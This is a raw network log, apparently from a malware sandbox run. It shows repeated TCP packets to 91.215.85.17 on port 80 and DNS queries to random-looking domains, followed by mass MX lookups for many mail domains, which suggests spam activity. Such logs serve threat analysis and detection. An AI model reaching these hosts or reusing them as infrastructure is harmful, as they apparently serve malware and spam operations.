                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.598541021 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.668266058 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.668488979 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.668550014 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.668605089 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.668675900 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.668739080 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.668751001 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.668791056 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.668950081 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.669173956 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.669218063 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.669315100 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.669646025 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.669728994 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.669900894 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.670011044 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.670052052 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.670166016 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.670213938 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.670227051 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.670310020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.670337915 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.670357943 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.670387030 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.670416117 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.670722961 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.670795918 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.670830011 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.671164036 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.671406984 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.671514988 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.671679020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.671782970 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.672159910 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.672229052 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.672369957 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.672465086 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.672580957 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.672640085 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.672753096 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.672826052 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.672832966 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.672967911 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.673003912 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.673176050 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.673214912 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.673346996 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.673401117 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.673508883 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.673582077 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.673600912 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.673702955 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.673705101 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.673748016 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.673964024 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.674005032 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.674067020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.674096107 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.674139023 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.674181938 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.674223900 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.674245119 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.674285889 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.674396992 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.674479008 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.674539089 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.674601078 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.674622059 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.674670935 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.674782038 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.674845934 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.675021887 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.675062895 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.675196886 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.675272942 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.675381899 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.675537109 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.675616980 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.675631046 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.675663948 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.675745964 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.676155090 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.676261902 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.676331997 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.676445007 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.676497936 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.676541090 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.676578999 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.676634073 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.676930904 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.677134037 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.677182913 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.677289009 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.677334070 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.677340984 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.677499056 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.677511930 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.677547932 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.677548885 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.677592993 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.677592993 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.677705050 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.677751064 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.677793980 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.677920103 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.677932024 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.677983999 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.743803024 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.743896008 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.743967056 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.744072914 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.744132042 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.744713068 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.744766951 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.744779110 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.744827986 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.744844913 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.744939089 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.744973898 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.744983912 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.744985104 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.745026112 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.745052099 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.745091915 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.745100975 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.745146036 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.745170116 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.745229959 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.745321035 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.745366096 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.745529890 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.745790005 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.745837927 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.745867968 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.745901108 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.745919943 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.745970011 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.745985985 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746032000 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746062040 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746110916 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746150970 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746200085 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746213913 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746265888 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746315956 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746387959 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746454000 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746474028 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746553898 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746591091 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746630907 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746690989 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746893883 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746948957 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746958971 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.746999025 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.747039080 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.747164965 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:21.452394009 CET192.168.2.41.1.1.10x73f2Standard query (0)onualituyrs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:21.617615938 CET192.168.2.41.1.1.10xdd5aStandard query (0)sumagulituyo.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.602066040 CET192.168.2.41.1.1.10x8eedStandard query (0)snukerukeutit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:23.321599007 CET192.168.2.41.1.1.10x3458Standard query (0)lightseinsteniki.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:24.917788029 CET192.168.2.41.1.1.10xfb01Standard query (0)liuliuoumumy.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:26.386681080 CET192.168.2.41.1.1.10x82caStandard query (0)stualialuyastrelia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:40.629127026 CET192.168.2.41.1.1.10x65f9Standard query (0)ftpvoyager.ccA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:41.464282036 CET192.168.2.41.1.1.10x4c46Standard query (0)bombertublestylebanws.funA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:41.623064995 CET192.168.2.41.1.1.10x65f9Standard query (0)ftpvoyager.ccA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:42.289992094 CET192.168.2.41.1.1.10x8924Standard query (0)dayfarrichjwclik.funA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:42.421246052 CET192.168.2.41.1.1.10x577eStandard query (0)neighborhoodfeelsa.funA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:42.636969090 CET192.168.2.41.1.1.10x65f9Standard query (0)ftpvoyager.ccA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.359591961 CET192.168.2.41.1.1.10xf64eStandard query (0)diagramfiremonkeyowwa.funA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:46.110835075 CET192.168.2.41.1.1.10xff8fStandard query (0)shpilliwilli.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:47.122549057 CET192.168.2.41.1.1.10xc6f1Standard query (0)linkofstrumble.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:51.558665991 CET192.168.2.41.1.1.10xeccdStandard query (0)cream.hitsturbo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:11.883193016 CET192.168.2.41.1.1.10x1057Standard query (0)humydrole.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:12.897072077 CET192.168.2.41.1.1.10x1057Standard query (0)humydrole.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:13.897274017 CET192.168.2.41.1.1.10x1057Standard query (0)humydrole.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.384205103 CET192.168.2.41.1.1.10x1461Standard query (0)eshopy-katalog.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.384448051 CET192.168.2.41.1.1.10x4125Standard query (0)eurisproagro.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.384579897 CET192.168.2.41.1.1.10xf626Standard query (0)nakacho.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.384768963 CET192.168.2.41.1.1.10xa38bStandard query (0)nippondotech.co.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.384955883 CET192.168.2.41.1.1.10x7a88Standard query (0)eurokamen.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.385224104 CET192.168.2.41.1.1.10xca9Standard query (0)oitacity.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.385548115 CET192.168.2.41.1.1.10xabb0Standard query (0)inhodinky.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.393528938 CET192.168.2.41.1.1.10x4fd1Standard query (0)e-art-studio.co.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.393778086 CET192.168.2.41.1.1.10x574Standard query (0)justdave.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.393838882 CET192.168.2.41.1.1.10x8579Standard query (0)feio.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.399297953 CET192.168.2.41.1.1.10xb6f7Standard query (0)daxter.fsnet.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.401782036 CET192.168.2.41.1.1.10x273cStandard query (0)clickbkk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.406140089 CET192.168.2.41.1.1.10xde45Standard query (0)khi-ho.ne.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.406481981 CET192.168.2.41.1.1.10x3089Standard query (0)detmar.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.406934977 CET192.168.2.41.1.1.10xdc2eStandard query (0)dobrybicykel.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.407151937 CET192.168.2.41.1.1.10x21caStandard query (0)kingsway-hk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.407330990 CET192.168.2.41.1.1.10x9ab1Standard query (0)aexoden.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.407497883 CET192.168.2.41.1.1.10x2087Standard query (0)abatek.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.407713890 CET192.168.2.41.1.1.10x1176Standard query (0)e-bicycles.euMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.411497116 CET192.168.2.41.1.1.10xced6Standard query (0)gabio.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.413887024 CET192.168.2.41.1.1.10x7163Standard query (0)konic.co.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.414050102 CET192.168.2.41.1.1.10xf377Standard query (0)aloeveraforever.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.414551020 CET192.168.2.41.1.1.10xedd2Standard query (0)enp.ericsson.seMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.425342083 CET192.168.2.41.1.1.10x1844Standard query (0)elossa.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.426038980 CET192.168.2.41.1.1.10xad14Standard query (0)eshopy-katalog.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.427416086 CET192.168.2.41.1.1.10xe0bStandard query (0)eurokamen.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.429322004 CET192.168.2.41.1.1.10x89e3Standard query (0)e-bicycles.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.434514999 CET192.168.2.41.1.1.10xdbecStandard query (0)izberatel.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.437356949 CET192.168.2.41.1.1.10x17daStandard query (0)feio.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.440171003 CET192.168.2.41.1.1.10x6ddfStandard query (0)elrocket.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.440998077 CET192.168.2.41.1.1.10xe808Standard query (0)kompresory-servis.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.441618919 CET192.168.2.41.1.1.10x9328Standard query (0)abatek.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.451365948 CET192.168.2.41.1.1.10x48beStandard query (0)aloeveraforever.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.471163988 CET192.168.2.41.1.1.10xc2b3Standard query (0)gabio.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.471656084 CET192.168.2.41.1.1.10xe198Standard query (0)e-art-studio.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.473102093 CET192.168.2.41.1.1.10xea4dStandard query (0)daxter.fsnet.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.479943037 CET192.168.2.41.1.1.10x391cStandard query (0)clickbkk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.481648922 CET192.168.2.41.1.1.10xc48fStandard query (0)kingsway-hk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.482805014 CET192.168.2.41.1.1.10xfd07Standard query (0)dobrybicykel.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.501205921 CET192.168.2.41.1.1.10x1d7cStandard query (0)aexoden.comA (IP address)IN (0x0001)false
